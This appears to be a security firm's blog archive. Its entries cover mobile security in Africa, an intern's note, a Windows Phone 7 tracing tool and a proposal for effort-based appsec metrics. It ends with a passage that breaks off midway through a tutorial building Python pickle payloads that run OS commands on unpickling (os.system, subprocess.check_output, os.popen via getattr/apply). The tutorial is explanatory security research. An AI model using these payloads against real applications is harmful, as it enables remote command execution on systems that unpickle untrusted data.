Wed, 7 Mar 2012

Mobile Security - Observations from the developing world

By the year 2015 sub-Saharan Africa will have more people with mobile network access than with access to electricity at home.
This remarkable fact from a 2011 MobileMonday report [1] came to mind again as I read an article just yesterday about the introduction of Mobile Money in the UK: By the start of next year, every bank customer in the country may have the ability to transfer cash between bank accounts, using an app on their mobile phone. [2]

I originally came across the MobileMonday report while researching the question of mobility and security in Africa for a conference I was asked to present at [3]. In this presentation I examine the global growth and impact of the so-called mobile revolution and then its relevance to Africa, before looking at some of the potential security implications this revolution will have.

The bit about the mobile revolution is easy: According to the Economist there will be 10 billion mobile devices connected to the Internet by 2020, and the number of mobile devices will surpass the number of PCs and laptops by this year already. The mobile-only Internet population will grow 56-fold from 14 million at the end of 2010 to 788 million by the end of 2015. Consumerization - the trend for new information technology to emerge first in the consumer market and then spread into business organizations, resulting in the convergence of the IT and consumer electronics industries - implies that the end-user is defining the roadmap for these technologies as manufacturers, networks and businesses scramble desperately to absorb their impact.

Africa, languishing behind in so many other respects, is right there on the rushing face of this new wave, as my initial quote illustrates. In fact the kind of mobile payment technology referred to in the BBC article is already quite prevalent in our home markets in Africa and we're frequently engaged to test mobile application security in various forms. In my presentation, for example, I make reference to m-Pesa - the mobile payments system launched in Kenya and now also mimicked in South Africa. Six million people in Kenya use m-Pesa, and more than 5% of that country's annual GDP is moved to and fro directly from mobile to mobile. There are nearly five times as many m-Pesa outlets as the total number of PostBank branches, post offices, bank branches, and automated teller machines (ATMs) in the country combined.

Closer to home in South Africa, it is estimated that the number of people with mobile phones outstrips the number of people with fixed-line Internet connections by a factor of ten! And this impacts our clients and their businesses directly: Approximately 44% of urban cellphone users in South Africa now make use of mobile banking services. The reasoning is clear: Where fixed infrastructure is poor, mobile will dominate, and where mobile dominates, mobile services will soon follow. Mobile banking, mobile wallets, mobile TV, mobile social networking and mobile strong-authentication systems are all already prevalent here in South Africa and are bringing with them the expected new array of security challenges. Understanding this is one of the reasons our customers come to us.

In my presentation I describe the Mobile Threat Model as having three key facets:

  • Security: The challenge of ensuring Confidentiality, Integrity and Authenticity for the data and transactions on the device;
  • Privacy: The implications of mobility (and especially convergence) for citizens and their rights to talk, move, think and act unobserved; and
  • Control: The challenge presented by the mobile revolution to governments fighting crime, gangsterism and terrorism.
All of these issues are real and complex, but I'm restricting myself to the security question here. I encourage readers to peruse the presentation itself for a full breakdown of the Threat Model because for this article I think it suffices to consider just the conclusion of my presentation, and it's this:

The technical security issues we discover on mobile devices and mobile applications today are really no different from what we've been finding in other environments for years. There are some interesting new variations and interesting new attack vectors, but it's really just a new flavor of the same thing. But there are four attributes of the modern mobile landscape that combine to present us with an entirely new challenge:

Firstly, mobiles are highly connected. The mobile phone is permanently on some IP network and by extension permanently on the Internet. However, it's also connected via GSM and CDMA; it's connected with your PC via USB, your Bluetooth headset and your GPS, and soon it will be connected with other devices in your vicinity via NFC. Never before in our history have communications been so converged, and all via the wallet-sized device in your pocket right now!

Secondly, the mobile device is deeply integrated. On or through this platform is everything anyone would ever want to know about you: Your location and location history, your phone calls, your messages, your personal data, your photos and your entire social network. Indeed, in an increasing number of technical paradigms, your mobile device is you! Moreover, the device has the ability to collect, store and transmit everything you say, see and hear, and everywhere you go!

Thirdly, as I've pointed out, mobile devices are incredibly widely distributed. Basically, everyone has one or soon will. And we're rapidly steering towards a homogeneous environment defined by Apple's iOS and Google's Android. Imagine the effect this has on the value of an exploit or attack vector.

Finally, the mobile landscape is still being very, very poorly managed. Except for the Apple AppStore, and recent advances by Google to manage the Android market, there is extremely little by way of standardization, automated patching or central management to be seen. Most devices, once deployed, will stay in commission for years to come and so security mistakes being made now are likely to become a nightmare for us in the future.

Thus, the technical issues well known from years of security testing in traditional environments are destined to prevail in mobile, and we're already seeing this in the environments we've tested. This reality, combined with how connected, integrated, distributed and poorly managed these platforms are, suggests that careless decisions today could cost us very dearly in the future...

[1] Mobile Africa Report 2011, Regional Hubs of Excellence and Innovation by Dr Madanmohan Rao, Research Project Director, MobileMonday March 2011

[2] http://www.bbc.co.uk/news/business-17115946

[3] http://prezi.com/as-szhrug5zr/examining-the-impact-of-the-adoption-of-mobile-devices-throughout-africa-and-the-subsequent-rise-of-security-related-risks-sensepost-information-security/

Wed, 21 Dec 2011

The first one...

My name is Kabelo Ramtse, a second-year engineering student at the University of Cape Town. Today is the last day of my internship, which ran for four weeks during my December vacation at the Cape Town office.

Internships are a new idea at SensePost aimed at students and are intended to give them exposure to the information security industry. I am the first person to take part in the program.

My main responsibility was to chronologically order, summarize and upload past SensePost presentations. The presentations are available here. The presentations Setiri and Breaking the bank are two of my favorites. Reading through the presentations taught me a lot about information security and made me even more keen to increase my knowledge in this field. Meeting the big boss and getting mini lectures from Marco was cool.

Tomorrow I fly home to Jo'burg to enjoy the rest of my vacation. Merry Christmas and happy new year!

Fri, 23 Sep 2011

Runtime analysis of Windows Phone 7 Applications

Runtime analysis is an integral part of most application security assessment processes. Many powerful tools have been developed to perform execution/data flow analysis and code debugging for desktop and server operating systems. Although a few dynamic analysis tools such as DroidBox are available for Android, I currently know of no similar public tools for the Windows Phone 7 platform. The main challenge for Windows Phone 7 is the lack of a programmable debugging interface in both the Emulator and phone devices. The Visual Studio 2010 debugger for Phone applications does not have an "Attach to process" feature and can only be used to debug applications for which the source code is available. Although the Kernel Independent Transport Layer (KITL) can be enabled on some Windows Phone devices at boot time, which could be very useful for kernel and unmanaged code debugging, it can't be used directly for code tracing of phone applications, which are executed by the .NET Compact Framework.

The following figure demonstrates an overview of the process which I have used to record the execution and data flow of Windows Phone 7 applications without using a debugger:

The instrumented phone application prints out method names and variables to the emulator console (which can be enabled by adding a registry key) at runtime. The console window buffer is then captured by an API hook (on the WriteFile API) in the emulator process and saved to the runtrace file. I have developed a tool named "XAP Spy" in C# to automate the above process. To run this tool you will need the Windows Phone 7 SDK and .NET Framework 4.0 and 2.0 (the API hook code is based on the EasyHook library, which only works with .NET Framework 2.0).

Runtime analysis demo of a WP7 software token

Download XAP Spy binaries

Download source code

Update (9/21/2011): XAP Spy binaries for Windows Phone SDK7.1 can be downloaded here.

Sun, 29 May 2011

Incorporating cost into appsec metrics for organisations

A longish post, but this wasn't going to fit into 140 characters. This is an argument about security metrics: it states that using pure vulnerability count-based metrics to talk about an organisation's application (in)security is insufficient, and suggests an alternative approach. Comments welcome.

Current metrics

Metrics and statistics are certainly interesting (none of those are infosec links). Within our industry, Verizon's Data Breach Investigations Report (DBIR) makes a splash each year, and Veracode are also receiving growing recognition for their State of Software Security (SOSS). Both are interesting to read and contain much insight. The DBIR specifically examines and records metrics for breaches, a post-hoc activity that only occurs once a series of vulnerabilities has been found and exploited by ruffians, while the SOSS provides insight into the opposing end of a system's life-cycle by automatically analysing applications before they are put into production (in a perfect world... no doubt they also examine apps that are already in production). Somewhat tangentially, Dr Geer wrote recently about a different metric for measuring the overall state of Cyber Security; we're currently at 1021.6. Oh noes!

Apart from the two bookends (SOSS and DBIR), other metrics are also published.

From a testing perspective, WhiteHat releases perhaps the most well-known set of metrics for appsec bugs, and in years gone by, Corsaire released statistics covering their customers. Also in 2008, WASC undertook a project to provide metrics with data sourced from a number of companies, however this too has not seen recent activity (last edit on the site was over a year ago). WhiteHat's metrics measure the number of serious vulnerabilities in each site (High, Critical, Urgent) and then slice and dice this based on the vulnerability's classification, the organisation's size, and the vertical within which they lie. WhiteHat is also in the fairly unique position of being able to record remediation times with a higher granularity than appsec firms that engage with customers through projects rather than service contracts. Corsaire's approach was slightly different; they recorded metrics in terms of the classification of the vulnerability, its impact and the year within which the issue was found. Their report contained similar metrics to the WhiteHat report (e.g. % of apps with XSS), but the inclusion of data from multiple years permitted them to extract trends from their data. (No doubt WhiteHat have trending data, however in the last report it was absent). Lastly, WASC's approach is very similar to WhiteHat's, in that a point in time is selected and vulnerability counts according to impact and classification are provided for that point.

Essentially, each of these approaches uses a base metric of vulnerability tallies, which are then viewed from different angles (classification, time-series, impact). While the metrics are collected per-application, they are easily aggregated into organisations.

Drawback to current approaches

Problems with just counting bugs are well known. If I ask you to rate two organisations, the Ostrogoths and the Visigoths, on their effectiveness in developing secure applications, and I tell you that the Ostrogoths have 20 critical vulnerabilities across their applications, while the Visigoths only have 5, without further data it seems that the Visigoths have the lead. However, if we introduce the fact that the Visigoths have a single application in which all 5 issues appear, while the Ostrogoths spread their 20 bugs across 10 applications, then it's not so easy to crow for the Visigoths, who average 5 bugs per application as opposed to the Ostrogoths' 2. Most reports take this into account, and report on a percentage of applications that exhibit a particular vulnerability (also seen as the probability that a randomly selected application will exhibit that issue). Unfortunately, even taking into account the number of applications is not sufficient; an organisation with 2 brochure-ware sites does not face the same risk as an organisation with 2 transaction-supporting financial applications, and this is where appsec metrics start to fray.

At the extreme edges of ideal metrics, the ability to factor in chains of vulnerabilities that individually present little risk, but combined are greater than the sum of their parts, would be fantastic. This aspect is ignored by most (including us), as a fruitful path isn't clear.

Why count in the first place?

Let's take a step back, and consider why we produce metrics; with the amount of data floating around, it's quite easy to extract information and publish, thereby earning a few PR points. However, are the metrics meaningful? The quick test is to ask whether they support decision making. For example, does it matter that external attackers were present in an overwhelming number of incidents recorded in the DBIR? I suspect that this is an easy "yes", since this metric justifies shifting priorities to extend perimeter controls rather than rolling out NAC.

One could just as easily claim that absolute bug counts are irrelevant and that they need to be relative to some other scale; commonly the number of applications an organisation has. However in this case, if the metrics don't provide enough granularity to accurately position your organisation with respect to others that you actually care about, then they're worthless to you in decision making. What drives many of our customers is not where they stand in relation to every other organisation, but specifically their peers and competitors. It's slightly ironic that oftentimes the more metrics released, the less applicable they are to individual companies. As a bank, knowing you're in the top 10% of a sample of banking organisations means something; when you're in the highest 10% of a survey that includes WebGoat clones, the results are much less clear.

In Seven Myths About Information Security Metrics, Dr Hinson raises a number of interesting points about security metrics. They're mostly applicable to security awareness, however they also carry across into other security activities. At least two serve my selfish needs, so I'll quote them here:

Myth 1: Metrics must be “objective” and “tangible”

There is a subtle but important distinction between measuring subjective factors and measuring subjectively. It is relatively easy to measure “tangible” or objective things (the number of virus incidents, or the number of people trained). This normally gives a huge bias towards such metrics in most measurement systems, and a bias against measuring intangible things (such as level of security awareness). In fact, “intangible” or subjective things can be measured objectively, but we need to be reasonably smart about it (e.g., by using interviews, surveys and audits). Given the intangible nature of security awareness, it is definitely worth putting effort into the measurement of subjective factors, rather than relying entirely on easy-to-measure but largely irrelevant objective factors. [G Hinson]

and

Myth 3: We need absolute measurements

For some unfathomable reason, people often assume we need “absolute measures”—height in meters, weight in pounds, etc. This is nonsense!
If I line up the people in your department against a wall, I can easily tell who is tallest, with no rulers in sight. This yet again leads to an unnecessary bias in many measurement systems. In fact, relative values are often more useful than absolute scales, especially to drive improvement. Consider this for instance: “Tell me, on an (arbitrary) scale from one to ten, how security aware are the people in your department are? OK, I'll be back next month to ask you the same question!” We need not define the scale formally, as long as the person being asked (a) has his own mental model of the processes and (b) appreciates the need to improve them. We needn't even worry about minor variations in the scoring scale from month to month, as long as our objective of promoting improvement is met. Benchmarking and best practice transfer are good examples of this kind of thinking. “I don't expect us to be perfect, but I'd like us to be at least as good as standard X or company Y. [G Hinson]

While he writes from the view of an organisation trying to decide whether their security awareness program is yielding dividends, the core statements are applicable for organisations seeking to determine the efficacy of their software security program. I'm particularly drawn to two points: the first is that intangibles are as useful as concrete metrics, and the second is that absolute measurements aren't necessary; comparative ordering is sometimes enough.

Considering cost

It seems that one of the intangibles that currently published appsec metrics don't take into account, is cost to the attacker. No doubt behind each vulnerability's single impact rating are a multitude of factors that contribute, one of which may be something like "Complexity" or "Ease of Exploitation". However, measuring effort in this way is qualitative and only used as a component in the final rating. I'm suggesting that cost (interchangeable with effort) be incorporated into the base metric used when slicing datasets into views. This will allow you to understand the determination an attacker would require when facing one of your applications. Penetration testing companies are in a unique position to provide this estimate; a tester unleashed on an application project is time-bounded and throws their experience and knowledge at the app. At the end, one can start to estimate how much effort was required to produce the findings and, over time, gauge whether your testers are increasing their effort to find issues (stated differently, do they find fewer bugs in the same amount of time?). If these metrics don't move in the right direction, then one might conclude that your security practices are also not improving (providing material for decision making).

Measuring effort, or attacker cost, is not new to security but it's mostly done indirectly through the sale of exploits (e.g. iDefense, ZDI). Even here, effort is not directly related to the purchase price, which is also influenced by other factors such as the number of deployed targets. In any case, for the custom applications that testers are mostly presented with, such public sources should be of little help (if your testers are submitting findings to ZDI, you have bigger problems). Every now and then, an exploit dev team will mention how long it took them to write an exploit for some weird Windows bug; these are always interesting data points, but are not specific enough for customers and the sample size is low.

Ideally, any measure of an attacker's cost can take into account both time and their exclusivity (or experience), however in practice this will be tough to gather from your testers. One could base it on their hourly rate, if your testing company differentiates between resources. In cases where they don't, or you're seeking to keep the metric simple, then another estimate for effort is the number of days spent on testing.

Returning to our sample companies, if the 5 vulnerabilities exposed in the Visigoths' application each required, on average, a single day to find, while the Ostrogoths' 20 bugs average 5 days each, then the effort required by an attacker is minimised by choosing to target the Visigoths. In other words, one might argue that the Visigoths are more at risk than the Ostrogoths.
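To make the comparison concrete, here is a minimal sketch in Python using only the figures quoted in this post. The Org class and its field names are hypothetical, and "days per finding" is just a rough stand-in for attacker effort, not a formal measure.

```python
from dataclasses import dataclass


@dataclass
class Org:
    """Hypothetical record of one organisation's assessment results."""
    name: str
    findings: int            # critical vulnerabilities found
    applications: int        # applications the findings are spread across
    days_per_finding: float  # average testing days needed per finding

    @property
    def findings_per_app(self) -> float:
        return self.findings / self.applications


visigoths = Org("Visigoths", findings=5, applications=1, days_per_finding=1)
ostrogoths = Org("Ostrogoths", findings=20, applications=10, days_per_finding=5)
orgs = [visigoths, ostrogoths]

# Raw count: the organisation with the fewest findings looks best.
best_by_count = min(orgs, key=lambda o: o.findings).name
# Per-application average: the fewest findings per application looks best.
best_by_density = min(orgs, key=lambda o: o.findings_per_app).name
# Attacker's view: the cheapest target is the one whose bugs are quickest to find.
cheapest_target = min(orgs, key=lambda o: o.days_per_finding).name

print(best_by_count, best_by_density, cheapest_target)
```

The three views disagree: the Visigoths win on raw count, the Ostrogoths win on bugs per application, and the Visigoths are the cheapest target once effort is considered.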

Metricload, take 1

In our first stab at incorporating effort, we selected an estimator of findings-per-day (or finding rate) to be the base metric against which the impact, classification, time-series and vertical attributes would be measured. From this, it's apparent that, subject to some minimum, the number of assessments performed is less important than the number of days worked. I don't yet have a way to answer what the minimum number of assessments should be, but it's clear that comparing two organisations where one has engaged with us 17 times and the other once, won't yield reliable results.

With this base metric, it's then possible to capture historical assessment data and provide both internal-looking metrics for an organisation as well as comparative metrics, if the testing company is also employed by your competitors. Internal metrics are the usual kinds (impact, classification, time-series), but the comparison option is very interesting. We're in the fortunate position of working with many top companies locally, and are able to compare competitors using this metric as a base. The actual ranking formula is largely unimportant here. Naturally, data must be anonymised so as to protect names; one could provide the customer with their rank only. In this way, the customer has an independent notion of how their security activities rate against their peers without embarrassing the peers.

Inverting the findings-per-day metric provides the average number of days to find a particular class of vulnerability, or impact level. That is, if a client averages 0.7 High or Critical findings per testing day, then on average it takes us 1.4 days of testing to find an issue of great concern, which is an easy way of expressing the base metric.
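The arithmetic is simple enough to sketch in a few lines of Python. The function names are mine, and the "7 findings over 10 testing days" input is a made-up client chosen only so that it reproduces the 0.7 rate quoted above.

```python
def finding_rate(findings: int, testing_days: float) -> float:
    """Findings per testing day (the base metric)."""
    if testing_days <= 0:
        raise ValueError("testing_days must be positive")
    return findings / testing_days


def days_per_finding(rate: float) -> float:
    """Invert the finding rate: average testing days per finding."""
    if rate <= 0:
        raise ValueError("rate must be positive")
    return 1 / rate


# Hypothetical client: 7 High or Critical findings over 10 testing days.
rate = finding_rate(7, 10)
print(rate, round(days_per_finding(rate), 1))
```

Rounded to one decimal place, the inverse of 0.7 is the 1.4 days mentioned above.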

What, me worry?

Without doubt, the findings-per-day estimator has drawbacks. For one, it doesn't take into consideration the tester's skill level (but this is also true of all appsec metrics published). This could be extended to include things like hourly rates, which indirectly measure skill. Also, the metric does not take into account functionality exposed by the site; if an organisation has only brochure-ware sites then it's unfair to compare them against transactional sites; this is mitigated at the time of analysis by comparing against peers rather than the entire sample group and also, to a degree, in the scoping of the project as a brochure-ware site would receive minimum testing time if scoped correctly.

As mentioned above, a minimum number of assessments would be needed before the metric is reliable; this hints at the deeper problem that randomly selected project days are not independent. An analyst stuck on a 4 week project is focused on a very small part of the broader organisation's application landscape. We counter this bias by including as many projects of the same type as possible.

Thought.rand()

If you can tease it out of them, finding rates could be an interesting method of comparing competing testing companies; ask "when testing companies of our size and vertical, what is your finding rate?", though there'd be little way to verify any claims. Can you foresee a day when testing companies advertise using their finding rate as the primary message? Perhaps...

This metric would also be very useful to include in each subsequent report for the customer, with every report containing an evaluation against their long-term vulnerability averages.

Field testing

Using the above findings-per-day metric as a base, we performed an historical analysis for a client on work performed over a number of years, with a focus on answering the following questions for them:
  1. On average, how long does it take to find issues at each Impact level (Critical down to Informational)?
  2. What are the trends for the various vulnerability classes? Does it take more or less time to find them year-on-year?
  3. What are the Top 10 issues they're currently facing?
  4. Where do they stand in relation to anonymised competitor data?
In preparation for the exercise, we had to capture a decent number of past reports, which was most time-consuming. What this highlighted for us was how paper-based reports and reporting are a serious hindrance to extracting useful data, and it has provided impetus internally for us to look into alternatives. The derived statistics were presented to the client in a workshop, with representatives from a number of the customer's teams present. We had little insight into the background to many of the projects, and it was very interesting to hear the analysis and opinions that emerged as they digested the information. For example, one set of applications exhibited particularly poor metrics from a security standpoint. Someone highlighted the fact that these were outsourced applications, which raised a discussion within the client about the pros and cons of using third party developers. It also suggests that many further attributes can be attached to the data that is captured: internal or third party, development lifecycle model (is agile producing better code for you than other models?), team size, platforms, languages, frameworks etc.

As mentioned above, a key test for metrics is whether they support decision making, and the feedback from the client was positive in this regard.

And now?

In summary, current security metrics, as they relate to talking about an organisation's application security, suffer from a resolution problem; they're not clear enough. Attacker effort is not modeled when discussing vulnerabilities, even though it's a significant factor when trying to get a handle on the ever slippery notion of risk. One approximation for attacker effort is to create a base metric of the number of findings-per-day for a broad set of applications belonging to an organisation, and use it to evaluate which kinds of vulnerabilities are typically present while at the same time clarifying how much effort an attacker requires in order to exploit them.

This idea is still being fleshed out. If you're aware of previous work in this regard or have suggestions on how to improve it (even abandon it) please get in contact.

Oh, and if you've read this far and are looking for training, we're at BH in August.

Mon, 15 Nov 2010

Playing with Python Pickle #2

[This is the second in a series of posts on Pickle. Link to part one.]

In the previous post I introduced Python's Pickle mechanism for serializing and deserializing data and provided a bit of background regarding where we came across serialized data, how the virtual machine works and noted that Python intentionally does not perform security checks when unpickling.

In this post, we'll work through a number of examples that depict exactly why unpickling untrusted data is a dangerous operation. Since we're going to handcraft Pickle streams, it helps to have an opcode reference handy; here are the opcodes we'll use:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. It's actually more subtle than this but this simplification works for us.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V<string>\n -> Push Unicode <string> object onto the stack (unlike S, the string is not quoted).
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the objects (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated as the arguments (a tuple) and the lower object as a callable (function object). Apply the callable to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo or register <index>.
  • g<index>\n -> Grab an object from memo or register <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine. If you're pasting the examples below into larger Pickle streams, make sure to remove the '.'
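A few of these opcodes can be tried out safely with streams that only build data. This is a minimal sketch assuming a Python 3 interpreter (this post was written against Python 2, but these protocol 0 streams still load); the variable names are mine. Each "\n" in the byte strings is the newline that terminates a string or memo argument.

```python
import pickle

# MARK, two strings, then 'l' collects them into a list.
as_list = pickle.loads(b"(S'a'\nS'b'\nl.")

# MARK, two strings, then 't' collects them into a tuple.
as_tuple = pickle.loads(b"(S'a'\nS'b'\nt.")

# Push 'x', store it in memo 0 ('p0'), discard it ('0'),
# then fetch it back from memo 0 ('g0').
via_memo = pickle.loads(b"S'x'\np0\n0g0\n.")

print(as_list, as_tuple, via_memo)
```

None of these streams uses 'c' or 'R', so nothing is imported or called while they are loaded.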
Executing OS commands

In the previous post, the canonical abuse case for unpickling untrusted data was listed: cos system (S'echo hello world' tR.

Let's step through this (the stack is included after each step, [SB] indicates the stack bottom):

  1. 'c' -> find the callable "os.system", push the callable onto the stack. [SB] [os.system]
  2. '(' -> push a MARK onto the stack [SB] [os.system] [MARK]
  3. "S'echo hello world'" -> push 'echo hello world' onto the stack [SB] [os.system] [MARK] ['echo hello world']
  4. 't' -> pop "echo hello world" and MARK, push the tuple "('echo hello world',)" onto the stack [SB] [os.system] [('echo hello world',)]
  5. 'R' -> pop "('echo hello world',)" and "os.system", call os.system('echo hello world'), push the result back on the stack [SB] [0]
  6. '.' -> pop the result off the stack and terminate [SB], result was '0'
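The same walk-through can be reproduced without running any command. The sketch below, assuming Python 3, uses the standard pickletools module to list the opcodes in the stream, and then loads a stream of the same shape that calls the harmless builtin len() instead of os.system(). The constant names and the len() substitution are mine, not part of the original example.

```python
import pickle
import pickletools

# The abuse case from the text, with its newlines written out explicitly.
EVIL = b"cos\nsystem\n(S'echo hello world'\ntR."

# genops() only parses the stream; nothing is imported or called.
opcode_names = [op.name for op, arg, pos in pickletools.genops(EVIL)]
print(opcode_names)

# Same shape (c, MARK, S, t, R, .), but calling len() on a string.
HARMLESS = b"cbuiltins\nlen\n(S'hello'\ntR."
result = pickle.loads(HARMLESS)
print(result)
```

The opcode names printed map onto the six steps above: GLOBAL is 'c', REDUCE is 'R' and STOP is '.'.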
<rat-hole>

Perhaps one instruction that should be clarified is 'c', which loads a class based on the two arguments 'module' and 'class'. Pickle's docs define the behaviour as follows: "The class object module.class is pushed on the stack. More accurately, the object returned by self.find_class(module, class) is pushed on the stack". Our previous simplified definition said that the 'c' instruction loaded function references, and this is the case, however the full explanation shows that more types than function references can be loaded.

For our purposes we want to load classes that are callable, which is a requirement for the 'R' instruction. A callable is an object that has a "__call__" attribute which, if you're also not a Python programmer, means having to search for more information. A non-expert definition is something like: if the module has functions (e.g. os.system()) then these are suitable for 'c'. However, class instance method objects (x=Foo();x.bar()) are not suitable for the 'c' opcode since it cannot handle class instances. It's also worth pointing out that the 'R' opcode doesn't care about what type of object it executes, so long as the object responds to "__call__". The interplay between 'c' and 'R' is important for the approach shown later, since 'c' is quite limited but 'R' can handle more types of objects.

What this rat-hole concludes with is that we have not come across a Pickle example showing how to execute method calls on class instance objects.

</rat-hole>

Let's try to improve on the command execution example. It's cute for executing commands, but if the unpickling happens on an app server then we won't see the output of the command, since "os.system()" returns the exit status of the shell rather than stdout/stderr. Any output of the command is printed to the server's stdout. Thus for our 'echo hello world' example, the unpickling returns '0' even though the command ran successfully.
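To see this for yourself, here is a minimal sketch, assuming Python 3 and a machine you own. The payload is the same instruction sequence written as bytes, with the newlines that protocol 0 expects after the 'c' and 'S' arguments.

```python
import pickle

# Protocol 0 is line-oriented: the arguments of 'c' and 'S' end at a newline.
payload = b"cos\nsystem\n(S'echo hello world'\ntR."

# Only ever unpickle a payload like this on a machine you control.
result = pickle.loads(payload)

# The command's output went to this process's stdout; the reconstructed
# "object" is only the shell's exit status.
print(repr(result))
```

The "hello world" text appears on the console of whoever runs the unpickling, which on an app server is not the attacker.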

Our first goal is to retrieve the output of commands in the reconstructed object. Initial ideas focused on manipulating the shell's return value to carry over output:

cos system (S'printf -v a \'%d\' "\'`uname -a | sed \'s/.\\{2\\}\\(.\\).*/\\1/\'`";exit $a;' tR.

This uses a combination of the shell's backticks, printf, sed and exit to return one character at a time in the exit status. However, this too is messy: if the output changes between invocations the approach is pretty worthless, and it's also noisy and low bandwidth.
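The idea can be sketched outside of Pickle. The snippet below is not the payload above. It is a simplified stand-in that assumes a POSIX "sh" with "cut" and "printf" available, and the helper name nth_char_via_exit_status is made up for illustration. It leaks one character of a command's output per invocation through the exit status.

```python
import subprocess

def nth_char_via_exit_status(command, index):
    """Return character `index` of `command`'s output, leaked via the exit status."""
    # printf "%d" "'X" prints the numeric code of the character X.
    script = 'c=$({cmd} | cut -c{pos}); exit $(printf "%d" "\'$c")'.format(
        cmd=command, pos=index + 1
    )
    status = subprocess.run(["sh", "-c", script]).returncode
    return chr(status)

# One full process invocation per character recovered.
first = nth_char_via_exit_status("echo hello", 0)
fifth = nth_char_via_exit_status("echo hello", 4)
print(first, fifth)
```

Each call re-runs the command and yields at most one byte, which is why the channel is so noisy and slow.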

The next option was "os.popen"; however, we quickly became bogged down. "os.popen()" returns an instance (e.g. proc=os.popen("echo foo")) and in order to access the output of the command, we'd need to call "proc.read()". However, as we've already mentioned, the pickle instruction set doesn't appear to support calling instance methods directly. The next option was to look for other modules, and the 'subprocess' module did the trick with its 'check_output()' function, which takes an executable and a set of arguments, runs the executable with those arguments and returns its output as a string:

csubprocess check_output (S'uname' tR.

returns

'Darwin\n'

This looks like good news in that we're executing commands and viewing output; however, the downsides quickly become apparent. "subprocess.check_output" does not invoke a shell, so we can't simply pass in "uname -a" as a single string; it needs to be broken up into arguments. More importantly though, "check_output" was only added in Python 2.7, so with earlier versions this won't work. We can easily overcome the first of these hurdles; "check_output" will take arguments specified in a list like so:

subprocess.check_output(["uname", "-a"])
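The difference between the two calling styles can be checked directly. This is a small sketch assuming Python 3 on a POSIX system where "uname" is on the PATH. Python 3 returns bytes rather than a Python 2 string.

```python
import subprocess

# Without a shell, a single string is treated as the program name, so
# "uname -a" is looked up as one (non-existent) executable.
try:
    subprocess.check_output("uname -a")
    single_string_worked = True
except OSError:
    single_string_worked = False

# Splitting the command into a list passes "-a" as a real argument.
output = subprocess.check_output(["uname", "-a"])
print(single_string_worked, output)
```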

We just need to craft the instructions to create a list and leave it on the stack:

csubprocess check_output ((S'uname' S'-a' ltR.

This is identical to the previous example except for the additional MARK instruction '(', the '-a' string argument and the 'l' instruction to build a list from the previous MARK. This is a rough execution trace of the VM on the instruction sequence:

  1. 'c' -> find the callable "subprocess.check_output", push the callable onto the stack. [SB] [subprocess.check_output]
  2. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK]
  3. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK] [MARK]
  4. "S'uname'" -> push 'uname' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname']
  5. "S'-a'" -> push '-a' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname'] ['-a']
  6. 'l' -> pop "uname", "-a" and MARK, push the list "['uname','-a']" onto the stack [SB] [subprocess.check_output] [MARK] [['uname','-a']]
  7. 't' -> pop "['uname','-a']" and MARK, push the tuple "(['uname','-a'])" onto the stack [SB] [subprocess.check_output] [(['uname','-a'])]
  8. 'R' -> pop "(['uname','-a'])" and "subprocess.check_output()", call subprocess.check_output((['uname','-a'])), push the result back on the stack [SB] ['Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n']
  9. '.' -> pop the result off the stack and terminate [SB], result was 'Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n'
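The trace above can be reproduced with a few lines, again assuming Python 3, a POSIX system with "uname", and a machine you own. The payload is the instruction sequence written out as bytes with its newlines restored.

```python
import pickle
import subprocess

# 'c', '(', '(', S'uname', S'-a', 'l', 't', 'R', '.' as in the trace.
payload = b"csubprocess\ncheck_output\n((S'uname'\nS'-a'\nltR."

# Unpickling runs subprocess.check_output(['uname', '-a']).
result = pickle.loads(payload)
print(repr(result))
```

On Python 3 the reconstructed object is a bytes value rather than a string, but the trailing newline is there either way.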
The result unfortunately carries a trailing newline, which is ugly. We can make use of the virtual machine to clean up the output for us, by calling "string.strip()" on the output:

cstring strip (csubprocess check_output ((S'uname' S'-a' ltRtR.

The trace has been omitted since it just includes another function call, but the approach hints at how one might go about dealing with class instances: attempt to call a module function on the class instance.
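In plain Python the same trick looks like the sketch below. Python 3 no longer has "string.strip()", so this swaps in "bytes.strip" reached through the class, which is an assumption made for illustration and not the function used in the payload above. The point is only that the instance is handed over as an ordinary argument.

```python
# Sample output taken from the earlier 'uname' example.
raw = b"Darwin\n"

# No method is called *on* the instance here: the function is looked up on
# the class and the instance is passed in as its first argument.
cleaned = bytes.strip(raw)
print(cleaned)
```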

If we rely on the "check_output" function, then we're still stuck with Python 2.7. Ideally we'd like to run "p=os.popen('ls -al');p.read()"; however, since the 'c' instruction requires modules and classes and cannot handle class instances, it is not possible to do this directly. It bears repeating, though, that the 'R' instruction can handle references to instance methods, since they are inherently callable. Thus we need to find a way to call an instance method using only functions. Cue a diversion into Python's introspection support:

  • __builtin__.getattr(foo, "attribute") returns foo.attribute, e.g. __builtin__.getattr(file, "read") -> file.read
  • __builtin__.apply(func, [arg1, arg2]) executes func(arg1, arg2)
Using the introspection tricks and without calling methods on class instances explicitly, we can execute "p=os.popen('ls -al'); p.read()" with the following Python:

__builtin__.apply(__builtin__.getattr(file,"read"),[os.popen("ls -al")])
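The same pattern can be tried on Python 3, with two substitutions that are assumptions of this sketch: "apply" was removed from the language, so a one-line stand-in is defined here, and io.StringIO takes the place of the "file" class and the object returned by os.popen.

```python
import io

def apply(func, args):
    """Stand-in for Python 2's __builtin__.apply, which Python 3 removed."""
    return func(*args)

stream = io.StringIO("foo\n")        # stand-in for os.popen("echo foo")
read = getattr(io.StringIO, "read")  # looked up on the class, not the instance
output = apply(read, [stream])       # equivalent to stream.read()
print(repr(output))
```

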